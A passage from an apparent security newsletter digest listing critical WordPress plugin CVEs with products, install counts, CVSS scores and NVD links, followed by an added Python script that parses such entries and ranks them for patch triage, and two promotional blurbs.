NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55976
CVE-2024-55977 - LaunchPage.app Importer allows SQL Injection from n/a through 1.1.
Product: LaunchPage.app Importer
Active Installations: unknown
CVSS Score: 9.3
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55977
CVE-2024-55981 - Nabz Image Gallery is vulnerable to SQL Injection from n/a through v1.00.
Product: Nabajit Roy Nabz Image Gallery
Active Installations: This plugin has been closed as of October 30, 2024 and is not available for download. This closure is temporary, pending a full review.
CVSS Score: 9.3
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55981
CVE-2024-55982 - Share Buttons – Social Media allows Blind SQL Injection from n/a through 1.0.2.
Product: richteam Share Buttons – Social Media
Active Installations: unknown
CVSS Score: 9.3
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55982
CVE-2024-55988 - Navayan CSV Export is vulnerable to Blind SQL Injection due to improper neutralization of special elements in an SQL command, affecting versions from n/a through 1.0.9.
Product: Amol Nirmala Waman Navayan CSV Export
Active Installations: This plugin has been closed as of December 5, 2024 and is not available for download. This closure is temporary, pending a full review.
CVSS Score: 9.3
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55988
CVE-2024-56012 - Pearlbells Flash News / Post (Responsive) is vulnerable to CSRF allowing Privilege Escalation from versions n/a through 4.1.
Product: Pearlbells Flash News / Post
Active Installations: This plugin has been closed as of October 15, 2024 and is not available for download. Reason: Security Issue.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-56012
CVE-2024-43234 - Woffice is vulnerable to authentication bypass via an alternate path or channel, impacting versions from n/a through 5.4.14.
Product: Envato Woffice
Active Installations: unknown
CVSS Score: 9.8 AtRiskScore 30
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43234
CVE-2024-54229 - Incorrect Privilege Assignment vulnerability in Straightvisions GmbH SV100 Companion allows Privilege Escalation. This issue affects SV100 Companion: from n/a through 2.0.02.
Product: Straightvisions GmbH SV100 Companion
Active Installations: This plugin has been closed as of December 5, 2024 and is not available for download. This closure is temporary, pending a full review.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54229
CVE-2024-54280 - WPBookit is vulnerable to SQL Injection due to improper neutralization of special elements in SQL commands, impacting versions from n/a through 1.6.0.
Product: Iqonic Design WPBookit
Active Installations: unknown
CVSS Score: 9.3
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54280
NVD References:
- https://patchstack.com/database/wordpress/plugin/wpbookit/vulnerability/wordpress-wpbookit-plugin-1-6-0-sql-injection-vulnerability?_s_id=cve
CVE-2024-54285 - SeedProd Pro is vulnerable to unrestricted upload of files with dangerous types, allowing attackers to upload web shells to a web server.
Product: SeedProd LLC SeedProd Pro
Active Installations: 800,000+
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54285
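As an added example that is not part of the @RISK digest, the script below parses the digest's own entry format (a CVE line followed by Product, Active Installations, CVSS Score, NVD and optional NVD References lines) into records and ranks them for patch triage. The three entries embedded as sample input are copied from the list above; the field names, the decision to put closed plugins at the top of the queue, and the "n/a through X" version comparison are this example's own assumptions, not something the newsletter states.

```python
"""Triage helper for a WordPress plugin CVE digest in the line format used above.
Added example: the parser, field names and ranking rule are assumptions of this
example, not part of the newsletter."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Three entries copied verbatim from the digest above, used as sample input.
SAMPLE_DIGEST = """\
CVE-2024-54297 - vBSSO-lite allows Authentication Bypass via an alternate path or channel in www.vbsso.com versions n/a through 1.4.3.
Product: vBSSO-lite
Active Installations: 6,000+
CVSS Score: 9.8 AtRiskScore 30
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54297
CVE-2024-54229 - Incorrect Privilege Assignment vulnerability in Straightvisions GmbH SV100 Companion allows Privilege Escalation.This issue affects SV100 Companion: from n/a through 2.0.02.
Product: Straightvisions GmbH SV100 Companion
Active Installations: This plugin has been closed as of December 5, 2024 and is not available for download. This closure is temporary, pending a full review.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54229
CVE-2024-54280 - WPBookit is vulnerable to SQL Injection due to improper neutralization of special elements in SQL commands, impacting versions from n/a through 1.6.0.
Product: Iqonic Design WPBookit
Active Installations: unknown
CVSS Score: 9.3
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54280
NVD References: https://patchstack.com/database/wordpress/plugin/wpbookit/vulnerability/wordpress-wpbookit-plugin-1-6-0-sql-injection-vulnerability?_s_id=cve
"""

@dataclass
class Advisory:
    cve: str
    summary: str
    product: str = ""
    installs: Optional[int] = None      # lower bound parsed from "6,000+"; None if unknown
    closed: bool = False                # plugin pulled from the wordpress.org directory
    cvss: float = 0.0
    at_risk: Optional[int] = None       # the digest's own "AtRiskScore", when present
    max_affected: Optional[str] = None  # last affected version, from "through X" in the summary
    nvd: str = ""
    references: list = field(default_factory=list)

CVE_LINE = re.compile(r"^(CVE-\d{4}-\d{4,}) - (.+)$")
MAX_VERSION = re.compile(r"through v?(\d+(?:\.\d+)*)")
CVSS_FIELD = re.compile(r"(\d+(?:\.\d+)?)(?:\s+AtRiskScore\s+(\d+))?")

def parse_digest(text: str) -> list:
    """Turn the digest's 'CVE line + key: value lines' blocks into Advisory records."""
    advisories, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = CVE_LINE.match(line)
        if m:                                   # a new entry starts on every CVE line
            cur = Advisory(cve=m.group(1), summary=m.group(2))
            v = MAX_VERSION.search(cur.summary)
            cur.max_affected = v.group(1) if v else None
            advisories.append(cur)
            continue
        if cur is None:                         # field lines before any CVE line are ignored
            continue
        key, _, value = line.partition(":")
        value = value.strip()
        if key == "Product":
            cur.product = value
        elif key == "Active Installations":
            if "closed" in value.lower():       # closed plugins carry prose instead of a count
                cur.closed = True
            else:
                n = re.match(r"([\d,]+)\+?", value)
                cur.installs = int(n.group(1).replace(",", "")) if n else None
        elif key == "CVSS Score":
            c = CVSS_FIELD.match(value)
            cur.cvss = float(c.group(1))
            cur.at_risk = int(c.group(2)) if c.group(2) else None
        elif key == "NVD":
            cur.nvd = value
        elif key == "NVD References" and value:
            cur.references.append(value)
        elif line.startswith("- http"):        # references listed one per line
            cur.references.append(line[2:])
    return advisories

def version_tuple(v: str) -> tuple:
    return tuple(int(p) for p in v.split("."))

def is_affected(adv: Advisory, installed: str) -> bool:
    """'n/a through X' means every release up to and including X is affected."""
    if adv.max_affected is None:
        return True                             # no upper bound given: assume affected
    return version_tuple(installed) <= version_tuple(adv.max_affected)

def triage(advisories: list) -> list:
    """Closed plugins first (no update can be pulled from wordpress.org while the plugin
    is closed, so the fix is to remove or isolate it), then by CVSS, then by install base."""
    return sorted(advisories, key=lambda a: (not a.closed, -a.cvss, -(a.installs or 0)))

if __name__ == "__main__":
    for a in triage(parse_digest(SAMPLE_DIGEST)):
        flag = "CLOSED" if a.closed else (f"installs>={a.installs}" if a.installs else "installs unknown")
        print(f"{a.cve}  CVSS {a.cvss}  {flag}  {a.product}  affected through {a.max_affected}")
```

Two caveats the ranking encodes: a plugin that the directory lists as closed cannot be updated from wordpress.org while it stays closed, so waiting for an auto-update is not a remediation path; and "n/a through X" in these summaries means every version up to and including X, so a site on exactly X is still affected. Where the digest reports installs as unknown, the script ranks by CVSS alone rather than guessing an install base.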
Is your vulnerability management program mitigating meaningful risk, or are you stuck at scan? Read this free guide (no registration required) to continuous threat and exposure management (CTEM) and learn how advanced cyber risk teams consolidate and prioritize risk signals at scale, measure mitigation efforts, and orchestrate remediation actions across multiple attack surfaces.
Webcast | 2024 SANS ICS Water Cybersecurity Survey Insights: Strengthening the Security of Water and Wastewater Utilities, January 23, 1:00 ET | With a focus on Industrial Control Systems (ICS), SCADA, and Distributed Control Systems (DCS) used in water treatment and distribution, we’ll explore emerging trends, highlight survey results, and share best practices to strengthen security measures.